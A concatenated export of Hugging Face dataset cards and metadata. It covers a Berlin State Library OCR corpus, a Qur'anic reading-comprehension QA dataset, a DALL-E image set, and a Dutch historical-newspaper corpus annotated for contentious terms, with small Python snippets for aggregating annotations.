"### Dataset Curators\n\n\nInitial data created by: Labusch, Kai; Zellhöfer, David",
"### Licensing Information\n\n\nCreative Commons Attribution 4.0 International",
"### Contributions\n\n\nThanks to @davanstrien for adding this dataset."
] | [
"TAGS\n#task_categories-fill-mask #task_categories-text-generation #task_ids-masked-language-modeling #task_ids-language-modeling #annotations_creators-machine-generated #language_creators-expert-generated #multilinguality-multilingual #size_categories-1M<n<10M #language-German #language-Dutch #language-English #language-French #language-Spanish #license-cc-by-4.0 #ocr #library #region-us \n",
"### Dataset Summary\n\n\n\n> \n> The digital collections of the SBB contain 153,942 digitized works from the time period of 1470 to 1945.\n> \n> \n> \n\n\n\n> \n> At the time of publication, 28,909 works have been OCR-processed resulting in 4,988,099 full-text pages.\n> For each page with OCR text, the language has been determined by langid (Lui/Baldwin 2012).\n> \n> \n>",
"### Supported Tasks and Leaderboards\n\n\n* 'language-modeling': this dataset has the potential to be used for training language models on historical/OCR'd text. Since it contains OCR confidence, language and date information for many examples, it is also possible to filter this dataset to more closely match the requirements for training data.\n*",
"### Languages\n\n\nThe collection includes material across a large number of languages. The languages of the OCR text have been detected using URL: An Off-the-shelf Language Identification Tool (Lui & Baldwin, ACL 2012). The dataset includes a confidence score for the language prediction. Note: not all examples may have been successfully matched to the language prediction table from the original data.\n\n\nThe frequency of the top ten languages in the dataset is shown below:\n\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nEach example represents a single page of OCR'd text.\n\n\nA single example of the dataset is as follows:",
"### Data Fields\n\n\n* 'file name': filename of the original XML file\n* 'text': OCR'd text for that page of the item\n* 'wc': the word confidence for each token predicted by the OCR engine\n* 'ppn': 'Pica production numbers' an internal ID used by the library. See \n-'language\\_confidence': confidence score given by 'URL'\n* publisher: publisher of the item in which the text appears\n* place: place of publication of the item in which the text appears\n* date: date of the item in which the text appears\n* title: title of the item in which the text appears\n* aut: author of the item in which the text appears",
"### Data Splits\n\n\nThis dataset contains only a single split 'train'.\n\n\nDataset Creation\n----------------\n\n\nThe dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo.",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo. This dataset includes text content produced through running Optical Character Recognition across 153,942 digitized works held by the Berlin State Library.\n\n\nThe URL was used to create this dataset.\n\n\nTo make the dataset more useful for training language models, the following steps were carried out:\n\n\n* the CSV 'xml2csv\\_alto.csv', which contains the full text corpus per document page (incl.OCR word confidences) was loaded using the 'datasets' library\n* this CSV was augmented with language information from 'URL' note some examples don't find a match for this. Sometimes this is because a text is blank, but some actual text may be missing predicted language information\n* the CSV was further augmented by trying to map the PPN to fields in a metadata download created using URL note not all examples are successfully matched to this metadata download.",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process\n\n\nThis dataset contains machine-produced annotations for:\n\n\n* the confidence scores the OCR engines used to produce the full-text materials.\n* the predicted languages and associated confidence scores produced by 'URL'\n\n\nThe dataset also contains metadata for the following fields:\n\n\n* author\n* publisher\n* the place of publication\n* title",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nThis dataset contains historical material, potentially including names, addresses etc., but these are not likely to refer to living individuals.\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases\n\n\nAs with any historical material, the views and attitudes expressed in some texts will likely diverge from contemporary beliefs. One should consider carefully how this potential bias may become reflected in language models trained on this data.",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\nInitial data created by: Labusch, Kai; Zellhöfer, David",
"### Licensing Information\n\n\nCreative Commons Attribution 4.0 International",
"### Contributions\n\n\nThanks to @davanstrien for adding this dataset."
] |
88b10b40e3197c83f2995771e057515f584ecd27 |
# Dataset Card for the Qur'anic Reading Comprehension Dataset (QRCD)
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://sites.google.com/view/quran-qa-2022/home
- **Repository:** https://gitlab.com/bigirqu/quranqa/-/tree/main/
- **Paper:** https://dl.acm.org/doi/10.1145/3400396
- **Leaderboard:**
- **Point of Contact:** @piraka9011
### Dataset Summary
The QRCD (Qur'anic Reading Comprehension Dataset) is composed of 1,093 tuples of question-passage pairs that are
coupled with their extracted answers to constitute 1,337 question-passage-answer triplets.
### Supported Tasks and Leaderboards
This task is evaluated as a ranking task.
To give credit to a QA system that may retrieve an answer (not necessarily at the first rank) that does not fully
match one of the gold answers but partially matches it, we use partial Reciprocal Rank (pRR) measure.
It is a variant of the traditional Reciprocal Rank evaluation metric that considers partial matching.
pRR is the official evaluation measure of this shared task.
We will also report Exact Match (EM) and F1@1, which are evaluation metrics applied only on the top predicted answer.
The EM metric is a binary measure that rewards a system only if the top predicted answer exactly matches one of the
gold answers.
Whereas, the F1@1 metric measures the token overlap between the top predicted answer and the best matching gold answer.
To get an overall evaluation score, each of the above measures is averaged over all questions.
### Languages
Qur'anic Arabic
## Dataset Structure
### Data Instances
To simplify the structure of the dataset, each tuple contains one passage, one question and a list that may contain
one or more answers to that question, as shown below:
```json
{
"pq_id": "38:41-44_105",
"passage": "واذكر عبدنا أيوب إذ نادى ربه أني مسني الشيطان بنصب وعذاب. اركض برجلك هذا مغتسل بارد وشراب. ووهبنا له أهله ومثلهم معهم رحمة منا وذكرى لأولي الألباب. وخذ بيدك ضغثا فاضرب به ولا تحنث إنا وجدناه صابرا نعم العبد إنه أواب.",
"surah": 38,
"verses": "41-44",
"question": "من هو النبي المعروف بالصبر؟",
"answers": [
{
"text": "أيوب",
"start_char": 12
}
]
}
```
Each Qur’anic passage in QRCD may have more than one occurrence; and each passage occurrence is paired with a different
question.
Likewise, each question in QRCD may have more than one occurrence; and each question occurrence is paired with a
different Qur’anic passage.
The source of the Qur'anic text in QRCD is the Tanzil project download page, which provides verified versions of the
Holy Qur'an in several scripting styles.
We have chosen the simple-clean text style of Tanzil version 1.0.2.
### Data Fields
* `pq_id`: Sample ID
* `passage`: Context text
* `surah`: Surah number
* `verses`: Verse range
* `question`: Question text
* `answers`: List of answers and their start character
### Data Splits
| **Dataset** | **%** | **# Question-Passage Pairs** | **# Question-Passage-Answer Triplets** |
|-------------|:-----:|:-----------------------------:|:---------------------------------------:|
| Training | 65% | 710 | 861 |
| Development | 10% | 109 | 128 |
| Test | 25% | 274 | 348 |
| All | 100% | 1,093 | 1,337 |
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
The QRCD v1.1 dataset is distributed under the CC-BY-ND 4.0 License https://creativecommons.org/licenses/by-nd/4.0/legalcode
For a human-readable summary of (and not a substitute for) the above CC-BY-ND 4.0 License, please refer to https://creativecommons.org/licenses/by-nd/4.0/
### Citation Information
```
@article{malhas2020ayatec,
author = {Malhas, Rana and Elsayed, Tamer},
title = {AyaTEC: Building a Reusable Verse-Based Test Collection for Arabic Question Answering on the Holy Qur’an},
year = {2020},
issue_date = {November 2020},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
volume = {19},
number = {6},
issn = {2375-4699},
url = {https://doi.org/10.1145/3400396},
doi = {10.1145/3400396},
journal = {ACM Trans. Asian Low-Resour. Lang. Inf. Process.},
month = {oct},
articleno = {78},
numpages = {21},
keywords = {evaluation, Classical Arabic}
}
```
### Contributions
Thanks to [@piraka9011](https://github.com/piraka9011) for adding this dataset.
| tarteel-ai/quranqa | [
"task_categories:question-answering",
"task_ids:extractive-qa",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"multilinguality:monolingual",
"size_categories:n<1K",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:ar",
"license:cc-by-nd-4.0",
"quran",
"qa",
"region:us"
] | 2022-07-26T19:05:10+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": ["ar"], "license": ["cc-by-nd-4.0"], "multilinguality": ["monolingual"], "size_categories": ["n<1K", "1K<n<10K"], "source_datasets": ["original"], "task_categories": ["question-answering"], "task_ids": ["extractive-qa"], "pretty_name": "Qur'anic Reading Comprehension Dataset", "tags": ["quran", "qa"]} | 2022-07-27T01:28:31+00:00 | [] | [
"ar"
] | TAGS
#task_categories-question-answering #task_ids-extractive-qa #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-n<1K #size_categories-1K<n<10K #source_datasets-original #language-Arabic #license-cc-by-nd-4.0 #quran #qa #region-us
| Dataset Card for the Qur'anic Reading Comprehension Dataset (QRCD)
==================================================================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Homepage: URL
* Repository: URL
* Paper: URL
* Leaderboard:
* Point of Contact: @piraka9011
### Dataset Summary
The QRCD (Qur'anic Reading Comprehension Dataset) is composed of 1,093 tuples of question-passage pairs that are
coupled with their extracted answers to constitute 1,337 question-passage-answer triplets.
### Supported Tasks and Leaderboards
This task is evaluated as a ranking task.
To give credit to a QA system that may retrieve an answer (not necessarily at the first rank) that does not fully
match one of the gold answers but partially matches it, we use partial Reciprocal Rank (pRR) measure.
It is a variant of the traditional Reciprocal Rank evaluation metric that considers partial matching.
pRR is the official evaluation measure of this shared task.
We will also report Exact Match (EM) and F1@1, which are evaluation metrics applied only on the top predicted answer.
The EM metric is a binary measure that rewards a system only if the top predicted answer exactly matches one of the
gold answers.
Whereas, the F1@1 metric measures the token overlap between the top predicted answer and the best matching gold answer.
To get an overall evaluation score, each of the above measures is averaged over all questions.
### Languages
Qur'anic Arabic
Dataset Structure
-----------------
### Data Instances
To simplify the structure of the dataset, each tuple contains one passage, one question and a list that may contain
one or more answers to that question, as shown below:
Each Qur’anic passage in QRCD may have more than one occurrence; and each passage occurrence is paired with a different
question.
Likewise, each question in QRCD may have more than one occurrence; and each question occurrence is paired with a
different Qur’anic passage.
The source of the Qur'anic text in QRCD is the Tanzil project download page, which provides verified versions of the
Holy Qur'an in several scripting styles.
We have chosen the simple-clean text style of Tanzil version 1.0.2.
### Data Fields
* 'pq\_id': Sample ID
* 'passage': Context text
* 'surah': Surah number
* 'verses': Verse range
* 'question': Question text
* 'answers': List of answers and their start character
### Data Splits
Dataset Creation
----------------
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
#### Who are the source language producers?
### Annotations
#### Annotation process
#### Who are the annotators?
### Personal and Sensitive Information
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
Additional Information
----------------------
### Dataset Curators
### Licensing Information
The QRCD v1.1 dataset is distributed under the CC-BY-ND 4.0 License URL
For a human-readable summary of (and not a substitute for) the above CC-BY-ND 4.0 License, please refer to URL
### Contributions
Thanks to @piraka9011 for adding this dataset.
| [
"### Dataset Summary\n\n\nThe QRCD (Qur'anic Reading Comprehension Dataset) is composed of 1,093 tuples of question-passage pairs that are\ncoupled with their extracted answers to constitute 1,337 question-passage-answer triplets.",
"### Supported Tasks and Leaderboards\n\n\nThis task is evaluated as a ranking task.\nTo give credit to a QA system that may retrieve an answer (not necessarily at the first rank) that does not fully\nmatch one of the gold answers but partially matches it, we use partial Reciprocal Rank (pRR) measure.\nIt is a variant of the traditional Reciprocal Rank evaluation metric that considers partial matching.\npRR is the official evaluation measure of this shared task.\nWe will also report Exact Match (EM) and F1@1, which are evaluation metrics applied only on the top predicted answer.\nThe EM metric is a binary measure that rewards a system only if the top predicted answer exactly matches one of the\ngold answers.\nWhereas, the F1@1 metric measures the token overlap between the top predicted answer and the best matching gold answer.\nTo get an overall evaluation score, each of the above measures is averaged over all questions.",
"### Languages\n\n\nQur'anic Arabic\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nTo simplify the structure of the dataset, each tuple contains one passage, one question and a list that may contain\none or more answers to that question, as shown below:\n\n\nEach Qur’anic passage in QRCD may have more than one occurrence; and each passage occurrence is paired with a different\nquestion.\nLikewise, each question in QRCD may have more than one occurrence; and each question occurrence is paired with a\ndifferent Qur’anic passage.\nThe source of the Qur'anic text in QRCD is the Tanzil project download page, which provides verified versions of the\nHoly Qur'an in several scripting styles.\nWe have chosen the simple-clean text style of Tanzil version 1.0.2.",
"### Data Fields\n\n\n* 'pq\\_id': Sample ID\n* 'passage': Context text\n* 'surah': Surah number\n* 'verses': Verse range\n* 'question': Question text\n* 'answers': List of answers and their start character",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators",
"### Licensing Information\n\n\nThe QRCD v1.1 dataset is distributed under the CC-BY-ND 4.0 License URL\nFor a human-readable summary of (and not a substitute for) the above CC-BY-ND 4.0 License, please refer to URL",
"### Contributions\n\n\nThanks to @piraka9011 for adding this dataset."
] | [
"TAGS\n#task_categories-question-answering #task_ids-extractive-qa #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-n<1K #size_categories-1K<n<10K #source_datasets-original #language-Arabic #license-cc-by-nd-4.0 #quran #qa #region-us \n",
"### Dataset Summary\n\n\nThe QRCD (Qur'anic Reading Comprehension Dataset) is composed of 1,093 tuples of question-passage pairs that are\ncoupled with their extracted answers to constitute 1,337 question-passage-answer triplets.",
"### Supported Tasks and Leaderboards\n\n\nThis task is evaluated as a ranking task.\nTo give credit to a QA system that may retrieve an answer (not necessarily at the first rank) that does not fully\nmatch one of the gold answers but partially matches it, we use partial Reciprocal Rank (pRR) measure.\nIt is a variant of the traditional Reciprocal Rank evaluation metric that considers partial matching.\npRR is the official evaluation measure of this shared task.\nWe will also report Exact Match (EM) and F1@1, which are evaluation metrics applied only on the top predicted answer.\nThe EM metric is a binary measure that rewards a system only if the top predicted answer exactly matches one of the\ngold answers.\nWhereas, the F1@1 metric measures the token overlap between the top predicted answer and the best matching gold answer.\nTo get an overall evaluation score, each of the above measures is averaged over all questions.",
"### Languages\n\n\nQur'anic Arabic\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nTo simplify the structure of the dataset, each tuple contains one passage, one question and a list that may contain\none or more answers to that question, as shown below:\n\n\nEach Qur’anic passage in QRCD may have more than one occurrence; and each passage occurrence is paired with a different\nquestion.\nLikewise, each question in QRCD may have more than one occurrence; and each question occurrence is paired with a\ndifferent Qur’anic passage.\nThe source of the Qur'anic text in QRCD is the Tanzil project download page, which provides verified versions of the\nHoly Qur'an in several scripting styles.\nWe have chosen the simple-clean text style of Tanzil version 1.0.2.",
"### Data Fields\n\n\n* 'pq\\_id': Sample ID\n* 'passage': Context text\n* 'surah': Surah number\n* 'verses': Verse range\n* 'question': Question text\n* 'answers': List of answers and their start character",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators",
"### Licensing Information\n\n\nThe QRCD v1.1 dataset is distributed under the CC-BY-ND 4.0 License URL\nFor a human-readable summary of (and not a substitute for) the above CC-BY-ND 4.0 License, please refer to URL",
"### Contributions\n\n\nThanks to @piraka9011 for adding this dataset."
] |
e7d4f3001b1c33740f10caa51c61cd4199e831e0 |
DallData is a non-exhaustive look into DALL-E Mega(1)'s unconditional image generation. This is under the [BirdL-AirL License.](https://huggingface.co/spaces/BirdL/license/)
(1)
```bibtext
@misc{Dayma_DALL·E_Mini_2021,
author = {Dayma, Boris and Patil, Suraj and Cuenca, Pedro and Saifullah, Khalid and Abraham, Tanishq and Lê Khắc, Phúc and Melas, Luke and Ghosh, Ritobrata},
doi = {10.5281/zenodo.5146400},
month = {7},
title = {DALL·E Mini},
url = {https://github.com/borisdayma/dalle-mini},
year = {2021}
}
``` | BirdL/DallData | [
"task_categories:unconditional-image-generation",
"size_categories:1K<n<10K",
"license:other",
"region:us"
] | 2022-07-26T19:48:02+00:00 | {"annotations_creators": [], "language_creators": [], "language": [], "license": ["other"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["unconditional-image-generation"], "task_ids": [], "pretty_name": "DALL-E Latent Space Mapping", "tags": []} | 2022-09-28T20:12:02+00:00 | [] | [] | TAGS
#task_categories-unconditional-image-generation #size_categories-1K<n<10K #license-other #region-us
|
DallData is a non-exhaustive look into DALL-E Mega(1)'s unconditional image generation. This is under the BirdL-AirL License.
(1)
| [] | [
"TAGS\n#task_categories-unconditional-image-generation #size_categories-1K<n<10K #license-other #region-us \n"
] |
794edc666ccae9f296d033a99a826a3f41f34385 | # Dataset Card for Contentious Contexts Corpus
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-instances)
- [Data Splits](#data-instances)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
## Dataset Description
- **Homepage:** [ConConCor](https://github.com/cultural-ai/ConConCor)
- **Repository:** [ConConCor](https://github.com/cultural-ai/ConConCor)
- **Paper:** [N/A]
- **Leaderboard:** [N/A]
- **Point of Contact:** [Jacco van Ossenbruggen](https://github.com/jrvosse)
**Note** One can also find a Datasheet produced by the creators of this dataset as a [PDF document](https://github.com/cultural-ai/ConConCor/blob/main/Dataset/DataSheet.pdf)
### Dataset Summary
This dataset contains extracts from historical Dutch newspapers containing keywords of potentially contentious words (according to present-day sensibilities). The dataset contains multiple annotations per instance, given the option to quantify agreement scores for annotations. This dataset can be used to track how words and their meanings have changed over time
### Supported Tasks and Leaderboards
- `text-classification`: This dataset can be used for tracking how the meanings of words in different contexts have changed and become contentious over time
### Languages
The text in the dataset is in Dutch. The responses are available in both English and Dutch. Suggestions, where present, are only in Dutch. The associated BCP-47 code is `nl`
## Dataset Structure
### Data Instances
```
{
'extract_id': 'H97',
'text': 'en waardoor het eerste doel wordt voorbijgestreefd om voor den 5D5c5Y 5d-5@5j5g5d5e5Z5V5V5c een speciale eigen werkingssfeer te
scheppen.Intusschen is het',
'target': '5D 5c5Y5d-5@5j5g5d5e5Z5V5V5c',
'annotator_responses_english': [
{'id': 'unknown_2a', 'response': 'Not contentious'},
{'id': 'unknown_2b', 'response': 'Contentious according to current standards'},
{'id': 'unknown_2c', 'response': "I don't know"},
{'id': 'unknown_2d', 'response': 'Contentious according to current standards'},
{'id': 'unknown_2e', 'response': 'Not contentious'},
{'id': 'unknown_2f', 'response': "I don't know"},
{'id': 'unknown_2g', 'response': 'Not contentious'}],
'annotator_responses_dutch': [
{'id': 'unknown_2a', 'response': 'Niet omstreden'},
{'id': 'unknown_2b', 'response': 'Omstreden naar huidige maatstaven'},
{'id': 'unknown_2c', 'response': 'Weet ik niet'},
{'id': 'unknown_2d', 'response': 'Omstreden naar huidige maatstaven'},
{'id': 'unknown_2e', 'response': 'Niet omstreden'},
{'id': 'unknown_2f', 'response': 'Weet ik niet'},
{'id': 'unknown_2g', 'response': 'Niet omstreden'}],
'annotator_suggestions': [
{'id': 'unknown_2a', 'suggestion': ''},
{'id': 'unknown_2b', 'suggestion': 'ander ras nodig'},
{'id': 'unknown_2c', 'suggestion': 'personen van ander ras'},
{'id': 'unknown_2d', 'suggestion': ''},
{'id': 'unknown_2e', 'suggestion': ''},
{'id': 'unknown_2f', 'suggestion': ''},
{'id': 'unknown_2g', 'suggestion': 'ras'}]
}
```
### Data Fields
|extract_id|text|target|annotator_responses_english|annotator_responses_dutch|annotator_suggestions|
|---|---|---|---|---|---|
|Unique identifier|Text|Target phrase or word|Response(translated to English)|Response in Dutch|Suggestions, if present|
### Data Splits
Train: 2720
## Dataset Creation
### Curation Rationale
> Cultural heritage institutions recognise the problem of language use in their collections. The cultural objects in archives, libraries, and museums contain words and phrases that are inappropriate in modern society but were used broadly back in times. Such words can be offensive and discriminative. In our work, we use the term "contentious" to refer to all (potentially) inappropriate or otherwise sensitive words. For example, words suggestive of some (implicit or explicit) bias towards or against something. The National Archives of the Netherlands stated that they "explore the possibility of explaining language that was acceptable and common in the past and providing it with contemporary alternatives", meanwhile "keeping the original descriptions [with contentious words], because they give an idea of the time in which they were made or included in the collection". There is a page on the institution website where people can report "offensive language".
### Source Data
#### Initial Data Collection and Normalization
> The queries were run on OCR'd versions of the Europeana Newspaper collection, as provided by the KB National Library of the Netherlands. We limited our pool to text categorised as "article", thus excluding other types of texts such as advertisements and family notices. We then only focused our sample on the 6 decades between 1890-01-01 and 1941-12-31, as this is the period available in the Europeana newspaper corpus. The dataset represents a stratified sample set over target word, decade, and newspaper issue distribution metadata. For the final set of extracts for annotation, we gave extracts sampling weights proportional to their actual probabilities, as estimated from the initial set of extracts via trigram frequencies, rather than sampling uniformly.
#### Who are the source language producers?
[N/A]
### Annotations
#### Annotation process
> The annotation process included 3 stages: pilot annotation, expert annotation, and crowdsourced annotation on the "Prolific" platform. All stages required the participation of Dutch speakers. The pilot stage was intended for testing the annotation layout, the instructions clarity, the number of sentences provided as context, the survey questions, and the difficulty of the task in general. The Dutch-speaking members of the Cultural AI Lab were asked to test the annotation process and give their feedback anonymously using Google Sheets. Six volunteers contributed to the pilot stage, each annotating the same 40 samples where either a context of 3 or 5 sentences surrounding the term were given. An individual annotation sheet had a table layout with 4 options to choose for every sample
> - 'Omstreden'(Contentious)
> - 'Niet omstreden'(Not contentious)
> - 'Weet ik niet'(I don't know)
> - 'Onleesbare OCR'(Illegible OCR)</br>
2 open fields
> - 'Andere omstreden termen in de context'(Other contentious terms in the context)
> - 'Notities'(Notes)</br>
and the instructions in the header. The rows were the samples with the highlighted words, the tickboxes for every option, and 2 empty cells for the open questions. The obligatory part of the annotation was to select one of the 4 options for every sample. Finding other contentious terms in the given sample, leaving notes, and answering 4 additional open questions at the end of the task were optional. Based on the received feedback and the answers to the open questions in the pilot study, the following decisions were made regarding the next, experts' annotation stage:
> - The annotation layout was built in Google Forms as a questionnaire instead of the table layout in Google Sheets to make the data collection and analysis faster as the number of participants would increase;
> - The context window of 5 sentences per sample was found optimal;
> - The number of samples per annotator was increased to 50;
> - The option 'Omstreden' (Contentious) was changed to 'Omstreden naar huidige maatstaven' ('Contentious according to current standards') to clarify that annotators should judge contentiousness of the word's use in context from today's perspective;
> - The annotation instruction was edited to clarify 2 points: (1) that annotators while judging contentiousness should take into account not only a bolded word but also the context surrounding it, and (2) if a word seems even slightly contentious to an annotator, they should choose the option 'Omstreden naar huidige maatstaven' (Contentious according to current standards);
> - The non-required field for every sample 'Notities' (Notes) was removed as there was an open question at the end of the annotation, where participants could leave their comments;
> - Another open question was added at the end of the annotation asking how much time it took to complete the annotation.
#### Who are the annotators?
Volunteers and Expert annotators
### Personal and Sensitive Information
[N/A]
## Considerations for Using the Data
## Accessing the annotations
Each example text has multiple annotations. These annotations may not always agree. There are various approaches one could take to calculate agreement, including a majority vote, rating some annotators more highly, or calculating a score based on the 'votes' of annotators. Since there are many ways of doing this, we have not implemented this as part of the dataset loading script.
An example of how one could generate an "OCR quality rating" based on the number of times an annotator labelled an example with `Illegible OCR`:
```python
from collections import Counter
def calculate_ocr_score(example):
annotator_responses = [response['response'] for response in example['annotator_responses_english']]
counts = Counter(annotator_responses)
bad_ocr_ratings = counts.get("Illegible OCR")
if bad_ocr_ratings is None:
bad_ocr_ratings = 0
return round(1 - bad_ocr_ratings/len(annotator_responses),3)
dataset = dataset.map(lambda example: {"ocr_score":calculate_ocr_score(example)})
```
To take the majority vote (or return a tie) based on whether a example is labelled contentious or not:
```python
def most_common_vote(example):
annotator_responses = [response['response'] for response in example['annotator_responses_english']]
counts = Counter(annotator_responses)
contentious_count = counts.get("Contentious according to current standards")
if not contentious_count:
contentious_count = 0
not_contentious_count = counts.get("Not contentious")
if not not_contentious_count:
not_contentious_count = 0
if contentious_count > not_contentious_count:
return "contentious"
if contentious_count < not_contentious_count:
return "not_contentious"
if contentious_count == not_contentious_count:
return "tied"
```
### Social Impact of Dataset
This dataset can be used to see how words change in meaning over time
### Discussion of Biases
> Due to the nature of the project, some examples used in this documentation may be shocking or offensive. They are provided only as an illustration or explanation of the resulting dataset and do not reflect the opinions of the project team or their organisations.
Since this project was explicitly created to help assess bias, it should be used primarily in the context of assess bias, and methods for detecting bias.
### Other Known Limitations
[Needs More Information]
## Additional Information
### Dataset Curators
[Cultural AI](https://github.com/cultural-ai)
### Licensing Information
CC-BY
### Citation Information
```
@misc{ContentiousContextsCorpus2021,
author = {Cultural AI},
title = {Contentious Contexts Corpus},
year = {2021},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\\url{https://github.com/cultural-ai/ConConCor}},
}
``` | biglam/contentious_contexts | [
"task_categories:text-classification",
"task_ids:sentiment-scoring",
"task_ids:multi-label-classification",
"annotations_creators:expert-generated",
"annotations_creators:crowdsourced",
"language_creators:machine-generated",
"multilinguality:monolingual",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:nl",
"license:cc-by-2.0",
"newspapers",
"historic",
"dutch",
"problematic",
"ConConCor",
"region:us"
] | 2022-07-26T21:07:48+00:00 | {"annotations_creators": ["expert-generated", "crowdsourced"], "language_creators": ["machine-generated"], "language": ["nl"], "license": ["cc-by-2.0"], "multilinguality": ["monolingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_categories": ["text-classification"], "task_ids": ["sentiment-scoring", "multi-label-classification"], "pretty_name": "Contentious Contexts Corpus", "tags": ["newspapers", "historic", "dutch", "problematic", "ConConCor"]} | 2022-08-01T16:02:11+00:00 | [] | [
"nl"
] | TAGS
#task_categories-text-classification #task_ids-sentiment-scoring #task_ids-multi-label-classification #annotations_creators-expert-generated #annotations_creators-crowdsourced #language_creators-machine-generated #multilinguality-monolingual #size_categories-1K<n<10K #source_datasets-original #language-Dutch #license-cc-by-2.0 #newspapers #historic #dutch #problematic #ConConCor #region-us
| Dataset Card for Contentious Contexts Corpus
============================================
Table of Contents
-----------------
* Dataset Description
+ Dataset Summary
+ Supported Tasks
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
Dataset Description
-------------------
* Homepage: ConConCor
* Repository: ConConCor
* Paper: [N/A]
* Leaderboard: [N/A]
* Point of Contact: Jacco van Ossenbruggen
Note One can also find a Datasheet produced by the creators of this dataset as a PDF document
### Dataset Summary
This dataset contains extracts from historical Dutch newspapers containing keywords of potentially contentious words (according to present-day sensibilities). The dataset contains multiple annotations per instance, given the option to quantify agreement scores for annotations. This dataset can be used to track how words and their meanings have changed over time
### Supported Tasks and Leaderboards
* 'text-classification': This dataset can be used for tracking how the meanings of words in different contexts have changed and become contentious over time
### Languages
The text in the dataset is in Dutch. The responses are available in both English and Dutch. Suggestions, where present, are only in Dutch. The associated BCP-47 code is 'nl'
Dataset Structure
-----------------
### Data Instances
### Data Fields
### Data Splits
Train: 2720
Dataset Creation
----------------
### Curation Rationale
>
